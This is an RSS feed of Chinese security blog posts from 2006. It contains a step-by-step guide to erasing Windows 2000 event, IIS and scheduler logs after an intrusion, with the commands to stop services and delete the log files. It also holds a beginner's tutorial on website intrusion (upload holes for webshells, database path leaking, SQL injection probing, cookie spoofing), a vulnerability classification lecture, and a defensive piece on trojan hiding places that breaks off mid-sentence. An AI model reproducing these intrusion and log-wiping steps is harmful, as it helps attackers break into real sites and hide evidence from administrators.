/>Fpipe和rineted是很牛的两个工具，通常我是用这两个工具来突破防火墙的，以后抽空说说这个问题。</p><img src ="http://www.cnitblog.com/zhangyafei/aggbug/21238.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-28 19:50 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21238.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>入侵3389后怎样擦除日志</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21236.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Thu, 28 Dec 2006 11:48:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21236.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21236.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21236.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21236.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21236.html</trackback:ping><description><![CDATA[一:开始 - 程序 - 管理工具 - 计算机管理 - 系统工具 -事件查看器，然后清除日志。 
<p></p><p><br />二: Windows2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等。 </p><p><br />日志文件默认位置： </p><p><br />应用程序日志、安全日志、系统日志、DNS日志默认位置：%sys temroot%\system32\config，默认文件大小512KB，管理员都会改变这个默认大小。 </p><p><br />安全日志文件：%systemroot%\system32\config\SecEvent.EVT； </p><p><br />系统日志文件：%systemroot%\system32\config\SysEvent.EVT； </p><p><br />应用程序日志文件：%systemroot%\system32\config\AppEvent.EVT； </p><p><br />Internet信息服务FTP日志默认位置：%systemroot%\system32\logfiles\msftpsvc1\，默认每天一个日志； </p><p><br />Internet信息服务WWW日志默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志； </p><p><br />Scheduler服务日志默认位置：%sys temroot%\schedlgu.txt； </p><p></p><p>以上日志在注册表里的键： </p><p><br />应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的： </p><p><br />HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog </p><p><br />有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。 </p><p><br />Schedluler服务日志在注册表中 </p><p><br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent </p><p></p><p>FTP和WWW日志详解： </p><p><br />FTP日志和WWW日志默认情况，每天生成一个日志文件，包含了该日的一切记录，文件名通常为ex（年份）（月份）（日期），例如ex001023，就是2000年10月23日产生的日志，用记事本就可直接打开，如下例： </p><p><br />#Software: Microsoft Internet Information Services 5.0　　（微软IIS5.0） </p><p>#Version: 1.0 （版本1.0） </p><p>#Date: 20001023 0315 （服务启动时间日期） </p><p>#Fields: time cip csmethod csuristem scstatus </p><p>0315 127.0.0.1 [1]USER administator 331　（IP地址为127.0.0.1用户名为administator试图登录） </p><p>0318 127.0.0.1 [1]PASS – 530　（登录失败） </p><p>032:04 127.0.0.1 [1]USER nt 331　（IP地址为127.0.0.1用户名为nt的用户试图登录） </p><p>032:06 127.0.0.1 [1]PASS – 530　（登录失败） </p><p>032:09 127.0.0.1 [1]USER cyz 331　（IP地址为127.0.0.1用户名为cyz的用户试图登录） </p><p>0322 127.0.0.1 [1]PASS – 530　（登录失败） </p><p>0322 127.0.0.1 [1]USER administrator 331　（IP地址为127.0.0.1用户名为administrator试图登录） </p><p>0324 127.0.0.1 [1]PASS – 230　（登录成功） </p><p>0321 127.0.0.1 [1]MKD nt 550　（新建目录失败） </p><p>0325 127.0.0.1 [1]QUIT – 550　（退出FTP程序） </p><p><br />从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统，换了四次用户名和密码才成功，管理员立即就可以得知管理员的入侵时间、IP地址以及探测的用户名，如上例入侵者最终是用administrator用户名进入的，那么就要考虑更换此用户名的密码，或者重命名administrator用户。 </p><p><br />WWW日志： </p><p><br />WWW服务同FTP服务一样，产生的日志也是在%sys temroot%\sys tem32\LogFiles\W3SVC1目录下，默认是每天一个日志文件，下面是一个典型的WWW日志文件 </p><p><br />#Software: Microsoft Internet Information Services 5.0 </p><p>#Version: 1.0 </p><p>#Date: 20001023 03:091 </p><p>#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent) </p><p>20001023 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) </p><p>20001023 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) </p><p>通过分析第六行，可以看出2000年10月23日，IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口，查看了一个页面iisstart.asp,这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt，有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。 </p><p><br />既使你删掉FTP和WWW日志，但是还是会在系统日志和安全日志里记录下来，但是较好的是只显示了你的机器名，并没有你的IP。 </p><p></p><p>属性里记录了出现警告的原因，是因为有人试图用administator用户名登录，出现一个错误，来源是FTP服务。 </p><p><br />这里有两种图标：钥匙（表示成功）和锁（表示当用户在做什么时被系统停止）。接连四个锁图标，表示四次失败审核，事件类型是帐户登录和登录、注销失败，日期为2000年10月18日，时间为1002，这就需要重点观察。 </p><p><br />双点第一个失败审核事件的，即得到此事件的详细描述。 </p><p><br />经过分析我们可以得知有个CYZ的工作站，用administator用户名登录本机，但是因为用户名未知或密码错误（实际为密码错误）未能成功。另外还有DNS服务器日志，不太重要，就此略过（其实是我没有看过它）。 </p><p><br />知道了Windows2000日志的详细情况，下面就要学会怎样删除这些日志： </p><p><br />通过上面，得知日志文件通常有某项服务在后台保护，除了系统日志、安全日志、应用程序日志等等，它们的服务是Windos2000的关键进程，而且与注册表文件在一块，当Windows2000启动后，启动服务来保护这些文件，所以很难删除，而FTP日志和WWW日志以及Scedlgu日志都是可以轻易地删除的。首先要取得Admnistrator密码或Administrators组成员之一，然后Telnet到远程主机，先来试着删除FTP日志： </p><p><br />D:\SERVER&gt;del schedlgu.txt </p><p>D:\SERVER\SchedLgU.Txt </p><p><br />进程无法访问文件，因为另一个程序正在使用此文件。说过了，后台有服务保护，先把服务停掉！ </p><p><br />D:\SERVER&gt;net stop "task scheduler" </p><p><br />下面的服务依赖于 Task Scheduler 服务。停止 Task Scheduler 服务也会停止这些服务。 </p><p><br />Remote Storage Engine </p><p><br />是否继续此操作? (Y/N) [N]: y </p><p>Remote Storage Engine 服务正在停止.... </p><p>Remote Storage Engine 服务已成功停止。 </p><p><br />Task Scheduler 服务正在停止. </p><p>Task Scheduler 服务已成功停止。 </p><p><br />OK，它的服务停掉了，同时也停掉了与它有依赖关系的服务。再来试着删一下！ </p><p><br />D:\SERVER&gt;del schedlgu.txt </p><p>D:\SERVER&gt; </p><p><br />没有反应？成功了！下一个是FTP日志和WWW日志，原理都是一样，先停掉相关服务，然后再删日志！ </p><p><br />D:\SERVER\system32\LogFiles\MSFTPSVC1&gt;del ex*.log </p><p><br />D:\SERVER\system32\LogFiles\MSFTPSVC1&gt; </p><p>以上操作成功删除FTP日志！再来WWW日志！ </p><p>D:\SERVER\system32\LogFiles\W3SVC1&gt;del ex*.log </p><p><br />D:\SERVER\system32\LogFiles\W3SVC1&gt; </p><p><br />OK！恭喜，现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了，守护这些日志的服务是Event Log，试着停掉它！ </p><p><br />D:\SERVER\system32\LogFiles\W3SVC1&gt;net stop eventlog </p><p><br />这项服务无法接受请求的 "暂停" 或 "停止" 操作。没办法，它是关键服务。如果不用第三方工具，在命令行上根本没有删除安全日志和系统日志的可能！所以还是得用虽然简单但是速度慢得死机的办法：打开“控制面板”的“管理工具”中的“事件查看器”（98没有，知道用Win2k的好处了吧），在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单，点击它，输入远程计算机的IP，然后等上数十分钟，接着选择远程计算机的安全性日志，右键选择它的属性：点击属性里的“清除日志”按钮，OK！安全日志清除完毕！同样的忍受痛苦去清除系统日志！ 目前在不借助第三工具的情况下，能很快，很顺利地清除FTP、WWW还有Schedlgu日志，就是系统日志和安全日志属于Windows2000的严密守护，只能用本地的事件查看器来打开它，因为在图形界面下，加之网速又慢，如果你银子多，时间闲，还是可以清除它的。综上所述，介绍了Windows2000的日志文件以及删除方法，但是你必须是Administrator，注意必须作为管理员或管理组的成员登录才能打开安全日志记录。该过程适用于 Windows 2000 Professional 计算机，也适用于作为独立服务器或成员服务器运行的 Windows 2000 Server 计算机。 </p><p>至此，Windows2000安全知识基础讲座完毕，还有几句话要讲，大家也看出来了，虽然FTP等等日志可以很快清除，但是系统日志和安全日志却不是那么快、那么顺利地能删除，如果遇到聪明的管理员，将日志文件转移到另一个地方，那更是难上加难，所以奉劝大家，千万不要拿国内的主机做试验，国内的法律很严呀！今天吃饭时，听说有两个人开玩笑，一个人把另外一个人的东西藏起来了，结果那个人一急，报案了，于是藏东西那个人被判四年刑！！法官说法律是不开玩笑的！！！所以大家一定要牢记这点！(不要说我老生常谈) </p><p></p><img src ="http://www.cnitblog.com/zhangyafei/aggbug/21236.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-28 19:48 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21236.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>漏洞分类及发掘讲座</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21229.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Thu, 28 Dec 2006 10:43:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21229.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21229.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21229.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21229.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21229.html</trackback:ping><description><![CDATA[
		<p>
				<font face="Arial">一、不同角度看安全漏洞的分类 <br />对一个特定程序的安全漏洞可以从多方面进行分类。 </font>
		</p>
		<font face="Arial">
				<p>1. 从用户群体分类： </p>
				<p>●大众类软件的漏洞。如Windows的漏洞、IE的漏洞等等。 </p>
				<p>●专用软件的漏洞。如Oracle漏洞、Apache漏洞等等。 </p>
				<p> 2.从数据角度看分为： </p>
				<p>●能读按理不能读的数据，包括内存中的数据、文件中的数据、用户输入的数据、数据库中的数据、网络上传输的数据等等。 </p>
				<p>●能把指定的内容写入指定的地方（这个地方包括文件、内存、数据库等） </p>
				<p>●输入的数据能被执行（包括按机器码执行、按Shell代码执行、按SQL代码执行等等） </p>
				<p> 3.从作用范围角度看分为： </p>
				<p>●远程漏洞，攻击者可以利用并直接通过网络发起攻击的漏洞。这类漏洞危害极大，攻击者能随心所欲的通过此漏洞操作他人的电脑。并且此类漏洞很容易导致蠕虫攻击，在Windows。 </p>
				<p>●本地漏洞，攻击者必须在本机拥有访问权限前提下才能发起攻击的漏洞。比较典型的是本地权限提升漏洞，这类漏洞在Unix系统中广泛存在，能让普通用户获得最高管理员权限。 </p>
				<p> 4.从触发条件上看可以分为： </p>
				<p>●主动触发漏洞，攻击者可以主动利用该漏洞进行攻击，如直接访问他人计算机。 </p>
				<p>●被动触发漏洞，必须要计算机的操作人员配合才能进行攻击利用的漏洞。比如攻击者给管理员发一封邮件，带了一个特殊的jpg图片文件，如果管理员打开图片文件就会导致看图软件的某个漏洞被触发，从而系统被攻击，但如果管理员不看这个图片则不会受攻击。 </p>
				<p> 5.从操作角度看可分为： </p>
				<p>●文件操作类型，主要为操作的目标文件路径可被控制（如通过参数、配置文件、环境变量、符号链接灯），这样就可能导致下面两个问题： </p>
				<p>◇写入内容可被控制，从而可伪造文件内容，导致权限提升或直接修改重要数据（如修改存贷数据），这类漏洞有很多，如历史上Oracle TNS LOG文件可指定漏洞，可导致任何人可控制运行Oracle服务的计算机； </p>
				<p>◇内容信息可被输出，包含内容被打印到屏幕、记录到可读的日志文件、产生可被用户读的core文件等等，这类漏洞在历史上Unix系统中的crontab子系统中出现过很多次，普通用户能读受保护的shadow文件； </p>
				<p>●内存覆盖，主要为内存单元可指定，写入内容可指定，这样就能执行攻击者想执行的代码（缓冲区溢出、格式串漏洞、PTrace漏洞、历史上Windows2000的硬件调试寄存器用户可写漏洞）或直接修改内存中的机密数据。</p>
				<p>
						<br />●逻辑错误，这类漏洞广泛存在，但很少有范式，所以难以查觉，可细分为： </p>
				<p>◇条件竞争漏洞（通常为设计问题，典型的有Ptrace漏洞、广泛存在的文件操作时序竞争） </p>
				<p>◇策略错误，通常为设计问题，如历史上FreeBSD的Smart IO漏洞。 </p>
				<p>◇算法问题（通常为设计问题或代码实现问题），如历史上微软的Windows 95/98的共享口令可轻易获取漏洞。 </p>
				<p>◇设计的不完善，如TCP/IP协议中的3步握手导致了SYN FLOOD拒绝服务攻击。 </p>
				<p>◇实现中的错误（通常为设计没有问题，但编码人员出现了逻辑错误，如历史上博彩系统的伪随机算法实现问题） </p>
				<p>●外部命令执行问题，典型的有外部命令可被控制（通过PATH变量，输入中的SHELL特殊字符等等）和SQL注入问题。 </p>
				<p>6. 从时序上看可分为： </p>
				<p>●已发现很久的漏洞：厂商已经发布补丁或修补方法，很多人都已经知道。这类漏洞通常很多人已经进行了修补，宏观上看危害比较小。 </p>
				<p>●刚发现的漏洞：厂商刚发补丁或修补方法，知道的人还不多。相对于上一种漏洞其危害性较大，如果此时出现了蠕虫或傻瓜化的利用程序，那么会导致大批系统受到攻击。 </p>
				<p>●0day：还没有公开的漏洞，在私下交易中的。这类漏洞通常对大众不会有什么影响，但会导致攻击者瞄准的目标受到精确攻击，危害也是非常之大。 </p>
				<p> 二、不同角度看待漏洞利用 <br />如果一个缺陷不能被利用来干“原本”不能干的事（安全相关的），那么就不能被称为安全漏洞，所以安全漏洞必然和漏洞利用紧密联系在一起。 <br />漏洞利用的视角有： </p>
				<p>●数据视角：访问本来不可访问的数据，包括读和写。这一条通常是攻击者的核心目的，而且可造成非常严重的灾难（如银行数据可被人写）。 </p>
				<p>●权限视角：主要为权限绕过或权限提升。通常权限提升都是为了获得期望的数据操作能力。 </p>
				<p>●可用性视角：获得对系统某些服务的控制权限，这可能导致某些重要服务被攻击者停止而导致拒绝服务攻击。 </p>
				<p>●认证绕过：通常利用认证系统的漏洞而不用受权就能进入系统。通常认证绕过都是为权限提升或直接的数据访问服务的。 </p>
				<p>●代码执行角度：主要是让程序将输入的内容作为代码来执行，从而获得远程系统的访问权限或本地系统的更高权限。这个角度是SQL注入、内存指针游戏类漏洞（缓冲区溢出、格式串、整形溢出等等）等的主要驱动。这个角度通常为绕过系统认证、权限提升、数据读取作准备的。 <br /> </p>
				<p>三、漏洞发掘方法 <br />首先必须清除安全漏洞是软件BUG的一个子集，一切软件测试的手段都对安全漏洞发掘实用。现在”黑客“用的各种漏洞发掘手段里有模式可循的有： <br />●fuzz测试（黑盒测试），通过构造可能导致程序出现问题的方式构造输入数据进行自动测试。 </p>
				<p>●源码审计（白盒测试），现在有了一系列的工具都能协助发现程序中的安全BUG，最简单的就是你手上最新版本的C语言编译器。 </p>
				<p>●IDA反汇编审计（灰盒测试），这和上面的源码审计非常类似，唯一不同的是很多时候你能获得软件，但你无法拿到源码来审计，但IDA是一个非常强大的反汇编平台，能让你基于汇编码（其实也是源码的等价物）进行安全审计。 </p>
				<p>●动态跟踪分析，就是记录程序在不同条件下执行的全部和安全问题相关的操作（如文件操作），然后分析这些操作序列是否存在问题，这是竞争条件类漏洞发现的主要途径之一，其他的污点传播跟踪也属于这类。 </p>
				<p>●补丁比较，厂商的软件出了问题通常都会在补丁中解决，通过对比补丁前后文件的源码（或反汇编码）就能了解到漏洞的具体细节。 <br />以上手段中无论是用哪种都涉及到一个关键点：需要通过人工分析来找到全面的流程覆盖路径。分析手法多种多样，有分析设计文档、分析源码、分析反汇编代码、动态调试程序等。 </p>
				<p>
						<br />四、漏洞等级评定 <br />考察漏洞的危害性应该紧密的和利用该漏洞带来的危害相关，并不是通常大家认识的所有缓冲区溢出漏洞都是高危漏洞。以远程漏洞为例，比较好的划分方法为： <br />1 可远程获取OS、应用程序版本信息。 <br />2 开放了不必要或危险得服务，可远程获取系统敏感信息。 <br />3 可远程进行受限的文件、数据读取。 <br />4 可远程进行重要或不受限文件、数据读取。 <br />5 可远程进行受限文件、数据修改。 <br />6 可远程进行受限重要文件、数据修改。<br />7 可远程进行不受限得重要文件、数据修改，或对普通服务进行拒绝服务攻击。 <br />8 可远程以普通用户身份执行命令或进行系统、网络级的拒绝服务攻击。 <br />9 可远程以管理用户身份执行命令（受限、不太容易利用）。 <br />10 可远程以管理用户身份执行命令（不受限、容易利用）。 <br />本地漏洞几乎都是导致代码执行,归入上面的10分制可以为: </p>
				<p>远程主动触发代码执行(如IE的漏洞). </p>
				<p>远程被动触发代码执行(如Word漏洞/看图软件漏洞). </p>
				<p>五、DEMO <br />一个防火墙隔离（只允许运维部的人访问）的网络里运行一台Unix服务器；操作系统中只有root用户和oracle用户可登陆，操作系统中运行了Apache（nobody权限）、Oracle（oracle用户权限）等服务。 <br />一个攻击者的目的是修改Oracle数据库中的帐单表的数据。 <br />其可能的攻击步骤为： <br />●1.接入运维部的网络，获得一个运维部的IP地址从而能通过防火墙访问被保护的Unix服务器。 <br />●2.利用Apache服务的某远程缓冲区溢出漏洞直接获得一个nobody权限的shell访问。 <br />●3.利用操作系统某suid程序的漏洞将自己的权限提升到root权限。 <br />●4.用Oracle的sysdba登陆进入数据库（本地登陆不需要密码）。 <br />●5.修改目标表的数据。<br /> <br />以上5个过程分析下来为： <br />●第1步：认证绕过 <br />●第2步：远程漏洞、代码执行(机器码)、认证绕过 <br />●第3步：权限提升、认证绕过 <br />●第4步：认证绕过 <br />●第5步：数据写</p>
		</font>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/21229.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-28 18:43 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21229.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>常用网站入侵手法讲座 </title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21228.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Thu, 28 Dec 2006 10:42:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21228.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21228.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21228.html#Feedback</comments><slash:comments>6</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21228.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21228.html</trackback:ping><description><![CDATA[
		<div id="FT">
				<p>
						<font face="Arial">这篇文章对于新手来说是比较喜欢的，因为网站入侵都是大家比较关注的，特别是新手，这对大家来说是一个比较热门的话题。入侵，新手要入侵首先必须知道入侵的详细步骤。现面就来看看本文给大家介绍的几种入侵方法吧。这里有五种入侵介绍。相信大家一定会喜欢的。<br />    <br />    首先介绍下什么样的站点可以入侵：必须是动态的网站 比如 asp php jsp 这种形式的站点 后缀为.htm的站点劝大家还是不要入侵了吧（入侵几率几乎为0） 入侵介绍： 1。上传漏洞 2。暴库 3。注入 4。旁注 5。COOKIE诈骗 </font>
				</p>
				<p>
						<font face="Arial">1：上传漏洞，这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗，利用上传漏洞可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传漏洞也是常见的漏洞。 怎样利用：在网站的地址栏中网址后加上/upfile.asp如果显示 上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL 工具介绍：上传工具 老兵的上传工具 DOMAIN3.5 这两个软件都可以达到上传的目的 用NC也可以提交 </font>
				</p>
				<p>
						<font face="Arial">WEBSHELL是什么：WEBSHELL在上节课简单的介绍了下，许多人都不理解，这里就详细讲下，其实WEBSHELL并不什么深奥的东西，是个WEB的权限，可以管理WEB，修改主页内容等权限，但是并没有什么特别高的权限，（这个看管理员的设置了）一般修改别人主页大多都需要这个权限，接触过WEB木马的朋友可能知道（比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马）我们上传漏洞最终传的就是这个东西，有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。 </font>
				</p>
				<p>
						<font face="Arial">2。暴库：这个漏洞现在很少见了，但是还有许多站点有这个漏洞可以利用，暴库就是提交字符得到数据库文件，得到了数据库文件我们就直接有了站点的前台或者后台的权限了。 </font>
				</p>
				<p>
						<font face="Arial">暴库方法：比如一个站的地址为 http://www.xxx.com/dispbbs.asp?boardID=7&amp;ID=161 我门就可以把com/dispbbs中间的/换成%5c 如果有漏洞直接得到数据库的绝对路径 用寻雷什么的下载下来就可以了 还有种方法就是利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径也可以得到数据库的路径（注意：这里的/也要换成%5c） </font>
				</p>
				<p>
						<font face="Arial">为什么换成%5c：因为在ASCII码里/等于%5c，有时碰到数据库名字为/#abc.mdb的为什么下不了？ 这里需要把#号换成%23就可以下载了，为什么我暴出的数据库文件是以。ASP结尾的？我该怎么办？这里可以在下载时把。ASP换成。MDB 这样就可以下载了如果还下载不了可能作了防下载。 </font>
				</p>
				<font face="Arial">
						<p>
								<br />3。注入漏洞：这个漏洞是现在应用最广泛，杀伤力也很大的漏洞，可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的，可以得到管理员的帐号密码等相关资料。 </p>
						<p>怎样利用：我先介绍下怎样找漏洞比如这个网址 http://www.xxx.com/dispbbs.asp?boardID=7&amp;ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面 再加上个and 1=2 来看看 如果返回正常页面说明没有漏洞 如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明也没有漏洞，知道了站点有没有漏洞我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多（NBSI NDSI 啊D DOMAIN等）都可以用来猜解帐号密码，因为是菜鸟接触，我还是建议大家用工具，手工比较烦琐。 </p>
						<p>
								<br />4。旁注：我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们要入侵的站点。打个形象的比喻， 比如你和我一个楼 我家很安全,而你家呢 却漏洞百出 现在有个贼想入侵我家 他对我家做了监视(也就是扫描)发现没有什么可以利用的东西 那么这个贼发现你家和我家一个楼 你家很容易就进去了 他可以先进入你家 然后通过你家得到整个楼的钥匙(系统权限) 这样就自然得到我的钥匙了 就可以进入我的家(网站) </p>
						<p>工具介绍：还是名小子的DOMIAN3.5不错的东西 ，可以检测注入 可以旁注 还可以上传！ </p>
						<p>5.COOKIE诈骗：许多人不知道什么是COOKIE，COOKIE是你上网时由网站所为你发送的值记录了你的一些资料，比如IP，姓名什么的。</p>
						<p>怎样诈骗呢？如果我们现在已经知道了XX站管理员的站号和MD5密码了 但是破解 不出来密码 （MD5是加密后的一个16位的密码）我们就可以用COOKIE诈骗来实现，把自己的ID修改成管理员的，MD5密码也修改成他的，有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的，系统以为你就是管理员了。 </p>
						<p>今天的介绍就到这里了 比较基础，都是概念性的东西，所有的都是我的个人理解，如有不正确的地方希望大家指出（个人认为就是 为什么换成%5c 这里有点问题）。</p>
				</font>
		</div>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/21228.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-28 18:42 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/28/21228.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>木马经典十大藏身地点大搜查</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/27/21173.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Wed, 27 Dec 2006 07:13:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/27/21173.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21173.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/27/21173.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21173.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21173.html</trackback:ping><description><![CDATA[
		<strong>
				<span class="tpc_title">木马经典十大藏身地点大搜查</span>
				<br />
				<br />
		</strong>
		<span class="tpc_content">
				<font size="2">木马是一种基于远程控制的病毒程序，该程序具有很强的隐蔽性和危害性，它可以在人不知鬼不觉的状态下控制你或者监视你。有人说，既然木马这么厉害，那我离它远一点不就可以了！ <br /><br />然而这个木马实在是“淘气”，它可不管你是否欢迎，只要它高兴，它就会想法设法地闯到你“家”中来的！哎呀，那还了得，赶快看看自己的电脑中有没有木马，说不定正在“家”中兴风作浪呢！那我怎么知道木马在哪里呢，相信不熟悉木马的菜鸟们肯定想知道这样的问题。下面就是木马潜伏的诡招，看了以后不要忘记采取绝招来对付这些损招哟！ <br /><br />1、集成到程序中 <br /><br />其实木马也是一个服务器-客户端程序，它为了不让用户能轻易地把它删除，就常常集成到程序里，一旦用户激活木马程序，那么木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。绑定到某一应用程序中，如绑定到系统文件，那么每一次Windows启动均会启动木马。 <br /><br />2、隐藏在配置文件中 <br /><br />木马实在是太狡猾，知道菜鸟们平时使用的是图形化界面的操作系统，对于那些已经不太重要的配置文件大多数是不闻不问了，这正好给木马提供了一个藏身之处。而且利用配置文件的特殊作用，木马很容易就能在大家的计算机中运行、发作，从而偷窥或者监视大家。不过，现在这种方式不是很隐蔽，容易被发现，所以在Autoexec.bat和Config.sys中加载木马程序的并不多见，但也不能因此而掉以轻心哦。 <br /><br />3、潜伏在Win.ini中 <br /><br />木马要想达到控制或者监视计算机的目的，必须要运行，然而没有人会傻到自己在自己的计算机中运行这个该死的木马。当然，木马也早有心理准备，知道人类是高智商的动物，不会帮助它工作的，因此它必须找一个既安全又能在系统启动时自动运行的地方，于是潜伏在Win.ini中是木马感觉比较惬意的地方。大家不妨打开Win.ini来看看，在它的[windows]字段中有启动命令“load=”和“run=”，在一般情况下“＝”后面是空白的，如果有后跟程序，比方说是这个样子：run=c:windowsfile.exeload=c:windowsfile.exe <br /><br />这时你就要小心了，这个file.exe很可能是木马哦。 <br /><br />4、伪装在普通文件中 <br /><br />这个方法出现的比较晚，不过现在很流行，对于不熟练的windows操作者，很容易上当。具体方法是把可执行文件伪装成图片或文本----在程序中把图标改成Windows的默认图片图标,再把文件名改为*.jpg.exe,由于Win98默认设置是"不显示已知的文件后缀名",文件将会显示为*.jpg,不注意的人一点这个图标就中木马了(如果你在程序中嵌一张图片就更完美了)。 <br /><br />5、内置到注册表中 <br /><br />上面的方法让木马着实舒服了一阵，既没有人能找到它，又能自动运行，真是快哉！然而好景不长，人类很快就把它的马脚揪了出来，并对它进行了严厉的惩罚！但是它还心有不甘，总结了失败教训后，认为上面的藏身之处很容易找，现在必须躲在不容易被人发现的地方，于是它想到了注册表！ <br /><br />的确注册表由于比较复杂，木马常常喜欢藏在这里快活，赶快检查一下，有什么程序在其下，睁大眼睛仔细看了，别放过木马哦：HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下所有以“run”开头的键值；HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion下所有以“run”开头的键值；HKEY-USERS.DefaultSoftwareMicrosoftWindowsCurrentVersion下所有以“run”开头的键值。 <br /><br />6、在System.ini中藏身 <br /><br />木马真是无处不在呀！什么地方有空子，它就往哪里钻！这不，Windows安装目录下的System.ini也是木马喜欢隐蔽的地方。还是小心点，打开这个文件看看，它与正常文件有什么不同，在该文件的[boot]字段中，是不是有这样的内容，那就是shell=Explorer.exefile.exe，如果确实有这样的内容，那你就不幸了，因为这里的file.exe就是木马服务端程序！另外，在System.ini中的[386Enh]字段，要注意检查在此段内的“driver=路径＼程序名”，这里也有可能被木马所利用。 <br />再有，在System.ini中的[mic]、[drivers]、[drivers32]这三个字段，这些段也是起到加载驱动程序的作用，但也是增添木马程序的好场所，现在你该知道也要注意这里喽。 <br /><br />7、隐形于启动组中 <br /><br />有时木马并不在乎自己的行踪，它更注意的是能否自动加载到系统中，因为一旦木马加载到系统中，任你用什么方法你都无法将它赶跑(哎，这木马脸皮也真是太厚)，因此按照这个逻辑，启动组也是木马可以藏身的好地方，因为这里的确是自动加载运行的好场所。 <br /><br />动组对应的文件夹为：C:windowsstartmenuprogramsstartup，在注册表中的位置： <br /><br 